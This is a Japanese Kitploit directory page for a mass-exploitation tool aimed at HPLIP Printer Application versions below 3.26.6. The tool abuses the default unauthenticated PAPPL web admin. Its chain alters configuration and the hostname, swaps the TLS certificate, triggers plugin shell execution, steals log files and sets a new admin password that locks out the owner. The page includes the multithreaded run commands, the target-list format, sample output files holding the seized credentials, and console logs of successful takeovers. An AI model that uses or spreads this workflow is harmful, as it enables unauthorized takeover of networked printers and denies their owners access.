Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-91097-CVE-2026-91106 — HPLIP < 3.26.6 — PAPPL Webインターフェース経由の完全な管理者乗っ取り(認証不要)。CVE-2026-91097からCVE-2026-91106に関連(CVSS 9.3) | Kitploit
ツール/GitHubGitHub/nxploited/cve-2026-91097-cve-2026-91106
防御ツール脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集ポストエクスプロイトウェブセキュリティネットワークセキュリティペネトレーションテスト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ペイロード開発
GitHubnxploited/cve-2026-91097-cve-2026-91106

CVE-2026-91097-CVE-2026-91106

HPLIP < 3.26.6 — PAPPL Webインターフェース経由の完全な管理者乗っ取り(認証不要)。CVE-2026-91097からCVE-2026-91106に関連(CVSS 9.3)

リポジトリを見る
41日前未レビュー

Affected Auth Impact

🔬 最新の脆弱性リサーチとエクスプロイトリリースについてはTelegramに参加してください
Telegram


HPLIP Printer Application — 認証不要の管理者乗っ取り

HPLIP Printer Application(PAPPLベースのWebインターフェース)の3.26.6より前のすべてのバージョンを対象とした大量エクスプロイトツール。このツールは、PAPPL Webインターフェースのデフォルトの認証不要状態を悪用して、完全な管理者乗っ取りチェーンを実行します。設定改ざん、ホスト名変更、TLS証明書の置き換え、HPプラグインのインストール(ターゲット上で.runファイルのシェル実行をトリガー)、システムログの窃取、管理者パスワードのロックアウトなどです。

このツールが悪用するもの

中核となる脆弱性はPAPPLの認証不要の管理アクセスです — HPLIP Printer Applicationはデフォルトでパスワードが設定されていない状態で出荷されるため、任意のネットワーク攻撃者がWebインターフェース(通常はポート8000)を通じて認証なしで全ての管理操作を実行できます。

さらに、プラグインインストールチェーンは以下で対処された弱点を悪用します:

CVECWECVSS 4.0関連性
CVE-2026-91097CWE-94 / CWE-7877.0plugin.specのパストラバーサル — このツールによってトリガーされるプラグインインストールは、脆弱なpluginhandler.pyコードを通過します
CVE-2026-91102CWE-78 / CWE-4948.4整合性チェックなしのダウンロード — プラグインの.runファイルはHTTP経由でダウンロードされ、ターゲット上でshによって実行されます

HPセキュリティ速報: HPSBPI04151

悪用されるエンドポイント

エクスプロイトチェーン

root@kitploit:~
ターゲット探索
    │
    ▼
HPLIP Printer Applicationの検出(Serverヘッダー+バージョン)
    │
    ▼
認証状態の確認(/security)
    │
    ├── パスワード設定済み ──► VULNとして記録(ロック済み)
    │
    └── パスワードなし(デフォルト) ──► エクスプロイトチェーン:
            │
            ├── 1. 設定の変更(/config)
            │       dns_sd_name, location, organization, contact_name
            │       検証済み:マーカーがレスポンスに反映
            │
            ├── 2. ホスト名の変更(/network)
            │       旧ホスト名を取得、新ホスト名を設定
            │       検証済み:新しい値がレスポンスに反映
            │
            ├── 3. TLS証明書のアップロード(/tls-install-crt)
            │       カスタムPEM証明書+秘密鍵
            │       マルチパートファイルアップロード
            │
            ├── 4. HPプラグインのインストール(/plugin)
            │       ステップ1:POST action=install-plugin(.runをダウンロード)
            │       ステップ2:POST action=license-accepted(shで実行)
            │       ⚠ CVE-2026-91097 + CVE-2026-91102
            │
            ├── 5. ログファイルの読み取り(/logfile.txt)
            │       システムパス、環境情報、Snapパス
            │
            └── 6. 管理者パスワードの設定(/security)
                    以降の認証不要アクセスをロックアウト
                    完全な管理者乗っ取りを完了

インストール

root@kitploit:~
pip install requests

**Python 3.8+**が必要です。その他の依存関係はありません。

使用方法

コマンドライン

root@kitploit:~
python T.py targets.txt 50
引数説明デフォルト
targets.txtターゲットリストを含むファイル(1行に1つ)プロンプト表示
50同時スレッド数15

対話モード

root@kitploit:~
python T.py

ツールはターゲットリストファイルとスレッド数の入力を求めます。

ターゲット形式

root@kitploit:~
192.168.1.100:8000
https://10.0.0.1:8000
http://printer.local:8000
192.168.1.100
printer.example.com
  • ポートが指定されていない場合、デフォルトで8000になります
  • スキームが指定されていない場合、HTTPとHTTPSの両方が試行されます
  • 重複するターゲットは自動的に排除されます
  • #で始まる行は無視されます

出力ファイル

例 — AdminS.txt

root@kitploit:~
http://192.168.1.100:8000 | v3.22.10 | password=Nx-zD_buovl6wko0 | server=HPLIP_Printer_Application/3.22.10-13 PAPPL/1.4.9 | panel=http://192.168.1.100:8000/ | security=http://192.168.1.100:8000/security | config=http://192.168.1.100:8000/config | ...

例 — Nx_modify.txt

root@kitploit:~
http://192.168.1.100:8000/config | v3.22.10 | type=CONFIG | verified=true | dns_sd_name: 'HPLIP Printer Application' -> 'HPLIP [marker]' | location: '' -> 'Nxploited-marker'
http://192.168.1.100:8000/network | v3.22.10 | type=HOSTNAME | verified=true | old=ORIGINAL-HOST.local | new=nx-abc123

コンソール出力

root@kitploit:~
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

   ██████   ██ ██   ██
   ██  ███  ██  ██ ██
   ██   ██████   ███
   ██    █████  ██ ██
   ██     ████ ██   ██

  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  HPLIP Printer Application  │  管理者乗っ取り + 完全制御
  影響を受ける < 3.26.6  │  PAPPL 認証不要アクセス

  CVE-2026-91097  │  プラグインパストラバーサル
  CVE-2026-91102  │  整合性チェックなしのプラグインダウンロード + シェル実行

  Web経由で悪用:  /security /config /network /plugin /tls-install-crt /logs

  By: Nxploited ( Khaled Alenazi )  │  Telegram: @Kxploit
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

 targets=4  threads=4

 00:11:34  [CUPS  ]  http://192.168.1.100:8000  Server: HPLIP_Printer_Application/3.22.10-13
 00:11:34  [VER   ]  http://192.168.1.100:8000  v3.22.10 < 3.26.6 AFFECTED
 00:11:35  [PROBE ]  http://192.168.1.100:8000  v3.22.10 | NO AUTH | exploiting...
 00:11:36  [CFG   ]  http://192.168.1.100:8000  CONFIG MODIFIED | marker=abc12345
 00:11:37  [NET   ]  http://192.168.1.100:8000  HOSTNAME 'OLD-HOST.local' -> 'nx-xyz789'
 00:11:38  [CERT  ]  http://192.168.1.100:8000  TLS CERT UPLOADED | marker=abc12345
 00:12:03  [PLG   ]  http://192.168.1.100:8000  PLUGIN | freshly_installed | shell_exec=True
 00:12:05  [LOG   ]  http://192.168.1.100:8000  logfile.txt | 19083B | env=/var/snap/hplip-printer-app/
 00:12:05  [ADMIN ]  http://192.168.1.100:8000  PASSWORD SET | pw=Nx-zD_buovl6wko0
 00:12:05  [HIT   ]  http://192.168.1.100:8000  v3.22.10 + CONFIG + HOSTNAME + CERT + PLUGIN + LOGS + ADMIN

 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 DONE  4/4  █ HIT=4  █ VULN=0  █ SAFE=0  █ SKIP=0

 ▐ Admin Takeover: 4  └─ AdminS.txt
 ▐ Modifications : 8  └─ Nx_modify.txt
 ▐ Cert Uploads  : 4  └─ Nx_upload.txt
 ▐ Plugin Exec   : 1  └─ Nx_plugin.txt
 ▐ Recon / Info  : 8  └─ Nx_recon.txt
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

ターゲット分類

タグ意味
HIT悪用に成功 — 管理者乗っ取りを達成
VULN

技術的な注意事項

  • HPLIP Printer ApplicationはUbuntuベースのシステム上でSnapパッケージとして動作し、データは/var/snap/hplip-printer-app/common/以下に保存されます
  • PAPPLフレームワークはTLS操作にGnuTLS(C API、シェルコマンドではない)を使用します — TLS証明書のアップロードはディスクに書き込みますが、コード実行をトリガーしません
  • プラグインのインストールはsh plugin.run --keep --nox11をトリガーし、HPの公式プラグインバイナリを実行します — コンテンツはHPサーバーからダウンロードされるため、攻撃者はプラグインのコンテンツを制御できませんが、その実行をトリガーします
  • このツールは再悪用を防ぐためにターゲットごとに一意のパスワードを設定し、検証用に認証情報をログに記録します
  • 各設定変更はランダムマーカーを使用し、変更が適用されたことを確認するためにサーバーレスポンスで検証されます
  • 任意のRCEはありません — このツールはWebシェルをアップロードしたり、任意のコマンドを注入したりしません。悪用可能なアクションは、管理者乗っ取り、設定改ざん、証明書の置き換え、HPプラグインの実行、情報漏洩です

参考文献

  • HP Security Bulletin HPSBPI04151
  • NVD — CVE-2026-91097
  • NVD — CVE-2026-91102
  • HPLIP Release Notes
  • PAPPL Framework

By: Nxploited


⚠️ 免責事項

このツールは、許可されたセキュリティリサーチ、ペネトレーションテスト、および教育目的のみに厳密に提供されています。システム所有者からの明示的な書面による許可なしにこのツールをシステムに対して使用することは、違法かつ非倫理的です。作者は、このツールの使用から生じるいかなる誤用、損害、または法的結果についても責任を負いません。セキュリティ評価を実施する前に、必ず適切な許可を取得してください。このツールを使用することにより、あなたは自身の行動および適用されるすべての法律と規制の遵守について単独で責任を負うことに同意するものとします。

ツールをダウンロード
エンドポイントアクション検証済み
/security管理者パスワードの設定(アカウント乗っ取り)✅
/configDNS-SD名、場所、組織、連絡先の変更✅
/networkシステムホスト名の変更✅
/tls-install-crt任意のTLS証明書+秘密鍵のアップロード✅
/pluginHPプラグインのダウンロード+ライセンス同意+インストールのトリガー(shで.runを実行)✅
/logfile.txtアプリケーションログファイル全体の読み取り(情報漏洩)✅
ファイル内容
AdminS.txt管理者乗っ取り — パスワード、サーバーバージョン、完全なパネルURLマップ
Nx_modify.txt検証済みの設定およびホスト名の変更(旧 → 新の値)
Nx_upload.txtTLS証明書アップロードの確認
Nx_plugin.txtシェル実行ステータスを含むHPプラグインインストール結果
Nx_recon.txt情報漏洩 — ログファイルサイズ、環境パス、バージョン
脆弱だがパスワードが既に設定済み(ロック済み)
SAFEバージョン ≥ 3.26.6(修正済み)
SKIPHPLIP Printer Applicationではない、または到達不能